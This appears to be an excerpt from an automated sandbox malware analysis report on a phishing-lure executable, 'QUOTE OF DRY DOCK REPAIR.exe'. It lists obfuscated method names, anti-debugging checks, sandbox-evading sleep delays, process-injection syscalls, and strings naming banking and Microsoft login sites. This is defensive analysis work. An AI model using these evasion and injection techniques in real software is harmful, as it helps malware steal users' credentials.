Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, EBdUrho7llOUOWMMam.cs	High entropy of concatenated method names: 'CMtKb1Cqth', 'xd0KqqJmi8', 'vQJx5w82ay', 'qUTxA8dr5o', 'PwaxJvH3Yu', 'UY8xUCMkML', 'EVmxiCrqQX', 'zPdxaNL6kt', 'H8qx7p3TvC', 'HUIxg2FsSA'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, dAac7cWQV3o8MffK5qK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aoKhlrx7nV', 'agWh8EGMie', 'Gbhhp93buC', 'LrdhnNEG3F', 'm8EhOEgMRl', 'NKRhTRIKre', 'uvYh101co1'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, jvrEcuxWt9tGGMiX8w.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ykcBETUhdA', 'X8jBvYRN4V', 'bC2BzwZVwc', 'NYN6Qx33qI', 'XBU6WYE5jj', 'NE16BJk1yL', 'nxN66dBfEA', 'UNNnhJ2g52Ef0oBRcFk'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, s3vFmGWWU6Cp4e86jvc.cs	High entropy of concatenated method names: 'UbehvHH0ew', 'UNMhzSsPgb', 'pbBIQ6ua74', 'IAQIWghyW0', 'kgJIB9e7oK', 'GOeI6NnD2q', 'ivWIFZhP6w', 'knvIsARKVZ', 'XI6IclIGU8', 'bT8IPmt5FR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, sneeQftREhj3FL0tmR.cs	High entropy of concatenated method names: 'MTqxXIqwLr', 'lJQxMcmRSi', 'WQhxZwi8v9', 'AFtxtk0wkE', 'BYRx2Q1dTC', 'C6jx40JfgA', 'W4jxdDtPra', 'Q1ExehkFWT', 'sKHxN5d6h5', 'LdbxhUVkVv'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, zltkGPZnD9ZwEclvOo.cs	High entropy of concatenated method names: 'K5dPn5GESZ', 'ELIPO8pyZo', 'HS5PTlPo9V', 'BwwP1ZvP7x', 'IGJPfbJrAg', 'jI5PrnRIME', 'TUbPCm6uqA', 'qdxPwMamQF', 'BQ5PEdyMGF', 'zv0PvjCVKJ'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, y3bqj7rPj2jLldCL42.cs	High entropy of concatenated method names: 'SNpdwJ6ob3', 'lvsdv7heJZ', 'F4BeQk3vPB', 'nnCeWFTlF5', 'RTudlDhbn2', 'Q2gd87MBQx', 'q8DdpjS4Vv', 'KSYdnXdFZ3', 'clXdOhOk0S', 'QBqdT9R31W'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, sCeuj9YajSgfkVDsdu.cs	High entropy of concatenated method names: 'lZc6sg2nke', 'vQV6cWorOE', 'xH96PAhYBU', 'sCq6x6q2JH', 'Va76KTZRuE', 'i6r69WcCpW', 'jKv6kYDrF7', 'g2j6YvlpFc', 'ebS6LEacso', 'S6r6RZhtqW'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, Ppmk7ITip6N03X2Jqt.cs	High entropy of concatenated method names: 'ToString', 'txx4lfruuy', 'Yk04DsX4FJ', 'CZk45PJRuS', 'rg14AY2sBo', 'hJO4J3eG7Q', 'jRq4U7sSxd', 'NLT4iwWHVI', 'KfB4aPKYNV', 'AaC47oAu7Y'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, tX60aHWFd5YWuCpNBjM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'v0xuNCDEtO', 'C30uhYSSv3', 'bDjuIcvbfP', 'FYNuuOxMTk', 'IMsu3puGe8', 'QZIuHElBjl', 'FGquy9EAS8'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, SNLl3CCsP5sX1XdMA0.cs	High entropy of concatenated method names: 'AVYN2jdnOV', 'FgKNd8TU4R', 'wffNN6GJJt', 'ClNNI2oyDV', 'e2dN3esLka', 'I8DNy8s6ip', 'Dispose', 'zPgec3Su0t', 'ABWePANPhl', 'cvHexnwdAW'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, N21qCtPKexS6stg8J6.cs	High entropy of concatenated method names: 'Dispose', 'HsXWE1XdMA', 'BLaBDRe2Kk', 'm545UO1K8X', 'FAeWv4AghU', 'hiaWzR6J0R', 'ProcessDialogKey', 'mYOBQvSASr', 'O1IBWIM5ck', 'J8hBBHdiWi'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, FbVk2S7NRvVZLxDfc3.cs	High entropy of concatenated method names: 'JD2kml4mpn', 'DDSkVh4APY', 'LNpkjRgl6I', 'ivpkXffHCN', 'cWokbBQGYe', 'BVPkMGIKKl', 'A4NkqmUrS9', 'D6qkZyghqk', 'TrYktl3B7s', 'Lf9kowOpuM'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, t3bNguFeFG5fL40fFF.cs	High entropy of concatenated method names: 'L3jWkltkGP', 'RD9WYZwEcl', 'UREWRhj3FL', 'FtmWGRtBdU', 'aMMW2amSPx', 'OmZW416lsA', 'P6YEy1icbsfc1QTZlF', 'lCfJ7XEjr1DvvUBAie', 'x7gWWhgudp', 'LB4W6wm3x9'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, JBcCvYiYQt0X2dIWsl.cs	High entropy of concatenated method names: 'U0CkcVZWON', 'NdDkxMX0GB', 'vapk9xuOuE', 'OCX9vd6X9e', 'unh9zhXn1f', 'ndSkQV0OlY', 'MpHkWAHg4A', 'kH5kBBfsIm', 'hTrk6VNLUQ', 'tvxkFVy6C6'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.4bc90b8.1.raw.unpack, vmPGApBGgOE6mDPqkv.cs	High entropy of concatenated method names: 'RbHjiasLk', 'lcTXcqFdx', 'Og4MxKyj2', 'F9OqMGoNZ', 'To2tBNqaV', 'Q1CoYaZQL', 'jXJWlGoMfIfkhLRn8i', 'SGoEqS1qwSWZDY1W7H', 'lOveOUSau', 'mxeh277P9'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, oPxlmZ016lsAH94Ydd.cs	High entropy of concatenated method names: 'Sjl9sxJk8o', 'e079PJQqeU', 'nP69KpA1X1', 'Lr99kmsqXY', 'gHe9YTImuC', 'iQCKf9RkLb', 'yXlKrgYar0', 'O3DKCcKjt4', 'EGXKw16UXA', 'LaGKEwFEZR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, RiPtXXz7oxRulhfgL3.cs	High entropy of concatenated method names: 'gJBhMU9jLf', 'eUshZQ51Ox', 'z5PhtXY9d8', 'M4rh0JUgAV', 'uEfhDPcs6T', 'EKNhAIYkHC', 'NqxhJpvk39', 'JiChy5mUi6', 'QZ8hmO7LNj', 'UHThVXiXUR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, YsZIgYpKH5sL5PKqQB.cs	High entropy of concatenated method names: 'Th5SZhM9sY', 'qEcSttZihT', 'qvlS0c3p5H', 'nmISDv3pZv', 'GaBSADMvEP', 'Ts6SJFRnht', 'lyBSi5MwuF', 'rXtSa5qLxm', 'xMHSgGaUJH', 'kqISlpA6hn'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, SvSASrE81IIM5ckJ8h.cs	High entropy of concatenated method names: 'Kp5N03aP2Q', 'K2ZNDmgv0u', 'KqLN5t9suv', 'asANA6M6Nx', 'NTeNJLoBHe', 'S7aNU3bS2x', 'NU2NiYyxNt', 'Kw0NahbASM', 'npaN7d1fGf', 'plZNg9JPKn'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, EBdUrho7llOUOWMMam.cs	High entropy of concatenated method names: 'CMtKb1Cqth', 'xd0KqqJmi8', 'vQJx5w82ay', 'qUTxA8dr5o', 'PwaxJvH3Yu', 'UY8xUCMkML', 'EVmxiCrqQX', 'zPdxaNL6kt', 'H8qx7p3TvC', 'HUIxg2FsSA'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, dAac7cWQV3o8MffK5qK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aoKhlrx7nV', 'agWh8EGMie', 'Gbhhp93buC', 'LrdhnNEG3F', 'm8EhOEgMRl', 'NKRhTRIKre', 'uvYh101co1'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, jvrEcuxWt9tGGMiX8w.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ykcBETUhdA', 'X8jBvYRN4V', 'bC2BzwZVwc', 'NYN6Qx33qI', 'XBU6WYE5jj', 'NE16BJk1yL', 'nxN66dBfEA', 'UNNnhJ2g52Ef0oBRcFk'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, s3vFmGWWU6Cp4e86jvc.cs	High entropy of concatenated method names: 'UbehvHH0ew', 'UNMhzSsPgb', 'pbBIQ6ua74', 'IAQIWghyW0', 'kgJIB9e7oK', 'GOeI6NnD2q', 'ivWIFZhP6w', 'knvIsARKVZ', 'XI6IclIGU8', 'bT8IPmt5FR'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, sneeQftREhj3FL0tmR.cs	High entropy of concatenated method names: 'MTqxXIqwLr', 'lJQxMcmRSi', 'WQhxZwi8v9', 'AFtxtk0wkE', 'BYRx2Q1dTC', 'C6jx40JfgA', 'W4jxdDtPra', 'Q1ExehkFWT', 'sKHxN5d6h5', 'LdbxhUVkVv'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, zltkGPZnD9ZwEclvOo.cs	High entropy of concatenated method names: 'K5dPn5GESZ', 'ELIPO8pyZo', 'HS5PTlPo9V', 'BwwP1ZvP7x', 'IGJPfbJrAg', 'jI5PrnRIME', 'TUbPCm6uqA', 'qdxPwMamQF', 'BQ5PEdyMGF', 'zv0PvjCVKJ'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, y3bqj7rPj2jLldCL42.cs	High entropy of concatenated method names: 'SNpdwJ6ob3', 'lvsdv7heJZ', 'F4BeQk3vPB', 'nnCeWFTlF5', 'RTudlDhbn2', 'Q2gd87MBQx', 'q8DdpjS4Vv', 'KSYdnXdFZ3', 'clXdOhOk0S', 'QBqdT9R31W'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, sCeuj9YajSgfkVDsdu.cs	High entropy of concatenated method names: 'lZc6sg2nke', 'vQV6cWorOE', 'xH96PAhYBU', 'sCq6x6q2JH', 'Va76KTZRuE', 'i6r69WcCpW', 'jKv6kYDrF7', 'g2j6YvlpFc', 'ebS6LEacso', 'S6r6RZhtqW'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, Ppmk7ITip6N03X2Jqt.cs	High entropy of concatenated method names: 'ToString', 'txx4lfruuy', 'Yk04DsX4FJ', 'CZk45PJRuS', 'rg14AY2sBo', 'hJO4J3eG7Q', 'jRq4U7sSxd', 'NLT4iwWHVI', 'KfB4aPKYNV', 'AaC47oAu7Y'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, tX60aHWFd5YWuCpNBjM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'v0xuNCDEtO', 'C30uhYSSv3', 'bDjuIcvbfP', 'FYNuuOxMTk', 'IMsu3puGe8', 'QZIuHElBjl', 'FGquy9EAS8'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, SNLl3CCsP5sX1XdMA0.cs	High entropy of concatenated method names: 'AVYN2jdnOV', 'FgKNd8TU4R', 'wffNN6GJJt', 'ClNNI2oyDV', 'e2dN3esLka', 'I8DNy8s6ip', 'Dispose', 'zPgec3Su0t', 'ABWePANPhl', 'cvHexnwdAW'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, N21qCtPKexS6stg8J6.cs	High entropy of concatenated method names: 'Dispose', 'HsXWE1XdMA', 'BLaBDRe2Kk', 'm545UO1K8X', 'FAeWv4AghU', 'hiaWzR6J0R', 'ProcessDialogKey', 'mYOBQvSASr', 'O1IBWIM5ck', 'J8hBBHdiWi'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, FbVk2S7NRvVZLxDfc3.cs	High entropy of concatenated method names: 'JD2kml4mpn', 'DDSkVh4APY', 'LNpkjRgl6I', 'ivpkXffHCN', 'cWokbBQGYe', 'BVPkMGIKKl', 'A4NkqmUrS9', 'D6qkZyghqk', 'TrYktl3B7s', 'Lf9kowOpuM'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, t3bNguFeFG5fL40fFF.cs	High entropy of concatenated method names: 'L3jWkltkGP', 'RD9WYZwEcl', 'UREWRhj3FL', 'FtmWGRtBdU', 'aMMW2amSPx', 'OmZW416lsA', 'P6YEy1icbsfc1QTZlF', 'lCfJ7XEjr1DvvUBAie', 'x7gWWhgudp', 'LB4W6wm3x9'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, JBcCvYiYQt0X2dIWsl.cs	High entropy of concatenated method names: 'U0CkcVZWON', 'NdDkxMX0GB', 'vapk9xuOuE', 'OCX9vd6X9e', 'unh9zhXn1f', 'ndSkQV0OlY', 'MpHkWAHg4A', 'kH5kBBfsIm', 'hTrk6VNLUQ', 'tvxkFVy6C6'
Source: 0.2.QUOTE OF DRY DOCK REPAIR.exe.8010000.6.raw.unpack, vmPGApBGgOE6mDPqkv.cs	High entropy of concatenated method names: 'RbHjiasLk', 'lcTXcqFdx', 'Og4MxKyj2', 'F9OqMGoNZ', 'To2tBNqaV', 'Q1CoYaZQL', 'jXJWlGoMfIfkhLRn8i', 'SGoEqS1qwSWZDY1W7H', 'lOveOUSau', 'mxeh277P9'

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\secinit.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\secinit.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\secinit.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\secinit.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\secinit.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\secinit.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\secinit.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\secinit.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: 16B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: 50A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: 94A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: A4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: A6B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: B6B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: BAD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: CAD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Memory allocated: DAD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\secinit.exe	Window / User API: threadDelayed 2205			Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Window / User API: threadDelayed 7767			Jump to behavior

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\secinit.exe	API coverage: 3.2 %

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTE OF DRY DOCK REPAIR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
QUOTE OF DRY DOCK REPAIR.exe

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe TID: 7668	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe TID: 7700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe TID: 7328	Thread sleep count: 2205 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe TID: 7328	Thread sleep time: -4410000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe TID: 7328	Thread sleep count: 7767 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe TID: 7328	Thread sleep time: -15534000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe TID: 1564	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe TID: 1564	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\secinit.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\secinit.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: 472E1186.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: 472E1186.6.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 472E1186.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 472E1186.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 472E1186.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 472E1186.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 472E1186.6.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 472E1186.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: fVnaqDZrZDB.exe, 00000009.00000002.3895362943.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: 472E1186.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 472E1186.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 472E1186.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: secinit.exe, 00000006.00000002.3893050955.0000000003140000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2141949418.000001B92B8BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 472E1186.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 472E1186.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 472E1186.6.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 472E1186.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 472E1186.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 472E1186.6.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 472E1186.6.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 472E1186.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 472E1186.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 472E1186.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 472E1186.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 472E1186.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\secinit.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\LWWwxbNafaIegGXnYXVPyHPZTWHilIvipowzmLlzTVEpKJhHAYtydWRXOwxbBu\fVnaqDZrZDB.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
